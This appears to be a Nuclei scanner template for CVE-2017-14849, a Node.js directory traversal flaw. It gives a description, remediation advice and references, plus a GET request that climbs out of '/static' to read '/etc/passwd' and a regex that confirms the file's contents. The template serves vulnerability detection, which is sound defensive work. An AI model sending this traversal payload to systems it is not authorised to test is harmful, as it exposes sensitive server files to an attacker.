45 lines
1.5 KiB
YAML
45 lines
1.5 KiB
YAML
id: CVE-2017-14849
|
|
|
|
info:
|
|
name: Node.js <8.6.0 - Directory Traversal
|
|
author: Random_Robbie
|
|
severity: high
|
|
description: Node.js before 8.6.0 allows remote attackers to access unintended files because a change to ".." handling is incompatible with the pathname validation used by unspecified community modules.
|
|
impact: |
|
|
An attacker can read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
|
|
remediation: |
|
|
Upgrade Node.js to version 8.6.0 or higher to mitigate the vulnerability.
|
|
reference:
|
|
- https://twitter.com/nodejs/status/913131152868876288
|
|
- https://nodejs.org/en/blog/vulnerability/september-2017-path-validation/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-14849
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2017-14849
|
|
cwe-id: CWE-22
|
|
epss-score: 0.96684
|
|
epss-percentile: 0.99566
|
|
cpe: cpe:2.3:a:nodejs:node.js:8.5.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: nodejs
|
|
product: node.js
|
|
tags: cve2017,cve,nodejs,lfi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/static/../../../a/../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a0047304502210091a03fe8bc062a8f4ab9b7ce6642025c5599951a009a17ed9ef4ffe4e24c7ccd0220570d8f49b671763897be8c2893f0da5b7e725eaa8a75b1d33581fc1327547dff:922c64590222798bb761d5b6d8e72950 |